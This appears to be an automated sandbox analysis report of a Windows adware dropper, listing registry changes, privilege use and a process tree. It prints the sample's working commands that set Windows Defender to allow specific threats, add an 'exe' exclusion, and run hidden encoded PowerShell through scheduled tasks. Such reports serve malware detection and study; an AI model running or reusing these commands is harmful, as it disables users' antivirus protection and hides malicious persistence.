Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\TypeLib\Version = "1.0"	cwWqefp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\TypeLib\ = "{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}"	cwWqefp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\ = "YoutubeAdBlock"	cwWqefp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\0	cwWqefp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\FLAGS	cwWqefp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}	cwWqefp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\FLAGS\ = "0"	cwWqefp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\HELPDIR\ = "C:\\Program Files (x86)\\VnDWhryCSIE"	cwWqefp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\TypeLib\ = "{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}"	cwWqefp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\ = "IQGKeKDyerbxjhpLMFJM"	cwWqefp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Programmable	cwWqefp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\TypeLib\Version = "1.0"	cwWqefp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Implemented Categories\	cwWqefp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\InprocServer32	cwWqefp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\Programmable	cwWqefp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}	cwWqefp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\TypeLib	cwWqefp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Implemented Categories	cwWqefp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\TypeLib = "{1D5A4199-956E-49BC-B89F-6A35C57C0D13}"	cwWqefp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid	cwWqefp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid32	cwWqefp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\ = "IQGKeKDyerbxjhpLMFJM"	cwWqefp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\TypeLib	cwWqefp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\ProxyStubClsid32	cwWqefp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Implemented Categories\	cwWqefp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Implemented Categories\{59FB2056-D625-48D0-A944-1A85B5AB2640}\	cwWqefp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	cwWqefp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\TypeLib\Version = "1.0"	cwWqefp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}	cwWqefp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Implemented Categories	cwWqefp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Implemented Categories\{59FB2056-D625-48D0-A944-1A85B5AB2640}	cwWqefp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\0\win32\ = "C:\\Program Files (x86)\\VnDWhryCSIE\\tjjvRAW.dll"	cwWqefp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\ = "_jeBzlVqRuIGFOqQBwZkYGeuXGR"	cwWqefp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\TypeLib\ = "{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}"	cwWqefp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid\ = "{00020424-0000-0000-C000-000000000046}"	cwWqefp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	cwWqefp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Programmable\	cwWqefp.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exepowershell.execwWqefp.exe

pid	process
2184	powershell.exe
2184	powershell.exe
2184	powershell.exe
1512	powershell.exe
1512	powershell.exe
1512	powershell.exe
2116	powershell.exe
2116	powershell.exe
2116	powershell.exe
4032	powershell.EXE
4032	powershell.EXE
4032	powershell.EXE
3908	powershell.exe
3908	powershell.exe
3908	powershell.exe
3224	powershell.exe
3224	powershell.exe
3224	powershell.exe
1512	powershell.exe
1512	powershell.exe
1512	powershell.exe
1492	powershell.exe
1492	powershell.exe
1492	powershell.exe
3860	powershell.exe
3860	powershell.exe
3860	powershell.exe
1516	powershell.EXE
1516	powershell.EXE
1516	powershell.EXE
3636	powershell.exe
3636	powershell.exe
3636	powershell.exe
3144	powershell.exe
3144	powershell.exe
3144	powershell.exe
1524	powershell.exe
1524	powershell.exe
1524	powershell.exe
3980	cwWqefp.exe
3980	cwWqefp.exe
3980	cwWqefp.exe
3980	cwWqefp.exe
3980	cwWqefp.exe
3980	cwWqefp.exe
3980	cwWqefp.exe
3980	cwWqefp.exe
3980	cwWqefp.exe
3980	cwWqefp.exe
3980	cwWqefp.exe
3980	cwWqefp.exe
3980	cwWqefp.exe
3980	cwWqefp.exe
3980	cwWqefp.exe
3980	cwWqefp.exe
3980	cwWqefp.exe
3980	cwWqefp.exe
3980	cwWqefp.exe
3980	cwWqefp.exe
3980	cwWqefp.exe
3980	cwWqefp.exe
3980	cwWqefp.exe
3980	cwWqefp.exe
3980	cwWqefp.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exeWMIC.exepowershell.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	2184	powershell.exe
Token: SeIncreaseQuotaPrivilege	3332	WMIC.exe
Token: SeSecurityPrivilege	3332	WMIC.exe
Token: SeTakeOwnershipPrivilege	3332	WMIC.exe
Token: SeLoadDriverPrivilege	3332	WMIC.exe
Token: SeSystemProfilePrivilege	3332	WMIC.exe
Token: SeSystemtimePrivilege	3332	WMIC.exe
Token: SeProfSingleProcessPrivilege	3332	WMIC.exe
Token: SeIncBasePriorityPrivilege	3332	WMIC.exe
Token: SeCreatePagefilePrivilege	3332	WMIC.exe
Token: SeBackupPrivilege	3332	WMIC.exe
Token: SeRestorePrivilege	3332	WMIC.exe
Token: SeShutdownPrivilege	3332	WMIC.exe
Token: SeDebugPrivilege	3332	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3332	WMIC.exe
Token: SeRemoteShutdownPrivilege	3332	WMIC.exe
Token: SeUndockPrivilege	3332	WMIC.exe
Token: SeManageVolumePrivilege	3332	WMIC.exe
Token: 33	3332	WMIC.exe
Token: 34	3332	WMIC.exe
Token: 35	3332	WMIC.exe
Token: 36	3332	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3332	WMIC.exe
Token: SeSecurityPrivilege	3332	WMIC.exe
Token: SeTakeOwnershipPrivilege	3332	WMIC.exe
Token: SeLoadDriverPrivilege	3332	WMIC.exe
Token: SeSystemProfilePrivilege	3332	WMIC.exe
Token: SeSystemtimePrivilege	3332	WMIC.exe
Token: SeProfSingleProcessPrivilege	3332	WMIC.exe
Token: SeIncBasePriorityPrivilege	3332	WMIC.exe
Token: SeCreatePagefilePrivilege	3332	WMIC.exe
Token: SeBackupPrivilege	3332	WMIC.exe
Token: SeRestorePrivilege	3332	WMIC.exe
Token: SeShutdownPrivilege	3332	WMIC.exe
Token: SeDebugPrivilege	3332	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3332	WMIC.exe
Token: SeRemoteShutdownPrivilege	3332	WMIC.exe
Token: SeUndockPrivilege	3332	WMIC.exe
Token: SeManageVolumePrivilege	3332	WMIC.exe
Token: 33	3332	WMIC.exe
Token: 34	3332	WMIC.exe
Token: 35	3332	WMIC.exe
Token: 36	3332	WMIC.exe
Token: SeDebugPrivilege	1512	powershell.exe
Token: SeIncreaseQuotaPrivilege	3700	WMIC.exe
Token: SeSecurityPrivilege	3700	WMIC.exe
Token: SeTakeOwnershipPrivilege	3700	WMIC.exe
Token: SeLoadDriverPrivilege	3700	WMIC.exe
Token: SeSystemProfilePrivilege	3700	WMIC.exe
Token: SeSystemtimePrivilege	3700	WMIC.exe
Token: SeProfSingleProcessPrivilege	3700	WMIC.exe
Token: SeIncBasePriorityPrivilege	3700	WMIC.exe
Token: SeCreatePagefilePrivilege	3700	WMIC.exe
Token: SeBackupPrivilege	3700	WMIC.exe
Token: SeRestorePrivilege	3700	WMIC.exe
Token: SeShutdownPrivilege	3700	WMIC.exe
Token: SeDebugPrivilege	3700	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3700	WMIC.exe
Token: SeRemoteShutdownPrivilege	3700	WMIC.exe
Token: SeUndockPrivilege	3700	WMIC.exe
Token: SeManageVolumePrivilege	3700	WMIC.exe
Token: 33	3700	WMIC.exe
Token: 34	3700	WMIC.exe
Token: 35	3700	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

67897b2c1425411173ea7054d21a93e6.exeSimplInst.exeSimplInst.execmd.exeforfiles.execmd.exepowershell.exeforfiles.execmd.exepowershell.exeforfiles.execmd.exepowershell.exeforfiles.execmd.exepowershell.EXE

description	pid	process	target process
PID 2016 wrote to memory of 1264	2016	67897b2c1425411173ea7054d21a93e6.exe	SimplInst.exe
PID 2016 wrote to memory of 1264	2016	67897b2c1425411173ea7054d21a93e6.exe	SimplInst.exe
PID 2016 wrote to memory of 1264	2016	67897b2c1425411173ea7054d21a93e6.exe	SimplInst.exe
PID 1264 wrote to memory of 2884	1264	SimplInst.exe	SimplInst.exe
PID 1264 wrote to memory of 2884	1264	SimplInst.exe	SimplInst.exe
PID 1264 wrote to memory of 2884	1264	SimplInst.exe	SimplInst.exe
PID 2884 wrote to memory of 2980	2884	SimplInst.exe	cmd.exe
PID 2884 wrote to memory of 2980	2884	SimplInst.exe	cmd.exe
PID 2884 wrote to memory of 2980	2884	SimplInst.exe	cmd.exe
PID 2980 wrote to memory of 1276	2980	cmd.exe	forfiles.exe
PID 2980 wrote to memory of 1276	2980	cmd.exe	forfiles.exe
PID 2980 wrote to memory of 1276	2980	cmd.exe	forfiles.exe
PID 1276 wrote to memory of 3056	1276	forfiles.exe	cmd.exe
PID 1276 wrote to memory of 3056	1276	forfiles.exe	cmd.exe
PID 1276 wrote to memory of 3056	1276	forfiles.exe	cmd.exe
PID 3056 wrote to memory of 2184	3056	cmd.exe	powershell.exe
PID 3056 wrote to memory of 2184	3056	cmd.exe	powershell.exe
PID 3056 wrote to memory of 2184	3056	cmd.exe	powershell.exe
PID 2184 wrote to memory of 3332	2184	powershell.exe	WMIC.exe
PID 2184 wrote to memory of 3332	2184	powershell.exe	WMIC.exe
PID 2184 wrote to memory of 3332	2184	powershell.exe	WMIC.exe
PID 2980 wrote to memory of 2088	2980	cmd.exe	forfiles.exe
PID 2980 wrote to memory of 2088	2980	cmd.exe	forfiles.exe
PID 2980 wrote to memory of 2088	2980	cmd.exe	forfiles.exe
PID 2088 wrote to memory of 1736	2088	forfiles.exe	cmd.exe
PID 2088 wrote to memory of 1736	2088	forfiles.exe	cmd.exe
PID 2088 wrote to memory of 1736	2088	forfiles.exe	cmd.exe
PID 1736 wrote to memory of 1512	1736	cmd.exe	powershell.exe
PID 1736 wrote to memory of 1512	1736	cmd.exe	powershell.exe
PID 1736 wrote to memory of 1512	1736	cmd.exe	powershell.exe
PID 1512 wrote to memory of 3700	1512	powershell.exe	WMIC.exe
PID 1512 wrote to memory of 3700	1512	powershell.exe	WMIC.exe
PID 1512 wrote to memory of 3700	1512	powershell.exe	WMIC.exe
PID 2980 wrote to memory of 1364	2980	cmd.exe	forfiles.exe
PID 2980 wrote to memory of 1364	2980	cmd.exe	forfiles.exe
PID 2980 wrote to memory of 1364	2980	cmd.exe	forfiles.exe
PID 1364 wrote to memory of 3184	1364	forfiles.exe	cmd.exe
PID 1364 wrote to memory of 3184	1364	forfiles.exe	cmd.exe
PID 1364 wrote to memory of 3184	1364	forfiles.exe	cmd.exe
PID 3184 wrote to memory of 2116	3184	cmd.exe	powershell.exe
PID 3184 wrote to memory of 2116	3184	cmd.exe	powershell.exe
PID 3184 wrote to memory of 2116	3184	cmd.exe	powershell.exe
PID 2116 wrote to memory of 2968	2116	powershell.exe	WMIC.exe
PID 2116 wrote to memory of 2968	2116	powershell.exe	WMIC.exe
PID 2116 wrote to memory of 2968	2116	powershell.exe	WMIC.exe
PID 2884 wrote to memory of 3932	2884	SimplInst.exe	forfiles.exe
PID 2884 wrote to memory of 3932	2884	SimplInst.exe	forfiles.exe
PID 2884 wrote to memory of 3932	2884	SimplInst.exe	forfiles.exe
PID 3932 wrote to memory of 1736	3932	forfiles.exe	cmd.exe
PID 3932 wrote to memory of 1736	3932	forfiles.exe	cmd.exe
PID 3932 wrote to memory of 1736	3932	forfiles.exe	cmd.exe
PID 1736 wrote to memory of 3332	1736	cmd.exe	reg.exe
PID 1736 wrote to memory of 3332	1736	cmd.exe	reg.exe
PID 1736 wrote to memory of 3332	1736	cmd.exe	reg.exe
PID 1736 wrote to memory of 3164	1736	cmd.exe	reg.exe
PID 1736 wrote to memory of 3164	1736	cmd.exe	reg.exe
PID 1736 wrote to memory of 3164	1736	cmd.exe	reg.exe
PID 2884 wrote to memory of 2232	2884	SimplInst.exe	schtasks.exe
PID 2884 wrote to memory of 2232	2884	SimplInst.exe	schtasks.exe
PID 2884 wrote to memory of 2232	2884	SimplInst.exe	schtasks.exe
PID 2884 wrote to memory of 3924	2884	SimplInst.exe	schtasks.exe
PID 2884 wrote to memory of 3924	2884	SimplInst.exe	schtasks.exe
PID 2884 wrote to memory of 3924	2884	SimplInst.exe	schtasks.exe
PID 4032 wrote to memory of 2204	4032	powershell.EXE	gpupdate.exe

C:\Users\Admin\AppData\Local\Temp\67897b2c1425411173ea7054d21a93e6.exe
"C:\Users\Admin\AppData\Local\Temp\67897b2c1425411173ea7054d21a93e6.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2016

C:\Users\Admin\AppData\Local\Temp\7zS6130.tmp\SimplInst.exe
.\SimplInst.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1264

C:\Users\Admin\AppData\Local\Temp\7zS6269.tmp\SimplInst.exe
.\SimplInst.exe /S /site_id=767
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2884

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" &
4⤵
- Suspicious use of WriteProcessMemory
PID:2980

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
5⤵
- Suspicious use of WriteProcessMemory
PID:1276

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Suspicious use of WriteProcessMemory
PID:3056

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2184

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:3332

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
5⤵
- Suspicious use of WriteProcessMemory
PID:2088

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Suspicious use of WriteProcessMemory
PID:1736

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1512

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:3700

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
5⤵
- Suspicious use of WriteProcessMemory
PID:1364

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Suspicious use of WriteProcessMemory
PID:3184

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2116

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
8⤵
PID:2968

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
4⤵
- Suspicious use of WriteProcessMemory
PID:3932

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
5⤵
- Suspicious use of WriteProcessMemory
PID:1736

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
6⤵
PID:3332

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
6⤵
PID:3164

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gweYxsSph" /SC once /ST 08:54:13 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
4⤵
- Creates scheduled task(s)
PID:2232

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gweYxsSph"
4⤵
PID:3924

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gweYxsSph"
4⤵
PID:2864

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bkckNrBYOjfprwtEPo" /SC once /ST 15:00:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\GGBXTQIHvxONXPngM\JPAWcIpLIGBPzJZ\aQrcOZA.exe\" OV /site_id 767 /S" /V1 /F
4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1460

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4032

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:2204

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:4076

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:3980

\??\c:\windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:964

C:\Users\Admin\AppData\Local\Temp\GGBXTQIHvxONXPngM\JPAWcIpLIGBPzJZ\aQrcOZA.exe
C:\Users\Admin\AppData\Local\Temp\GGBXTQIHvxONXPngM\JPAWcIpLIGBPzJZ\aQrcOZA.exe OV /site_id 767 /S
1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:3472

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" &
2⤵
PID:2192

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
3⤵
PID:2968

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
4⤵
PID:1304

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3908

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:3768

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
3⤵
PID:3832

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
4⤵
PID:3976

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3224

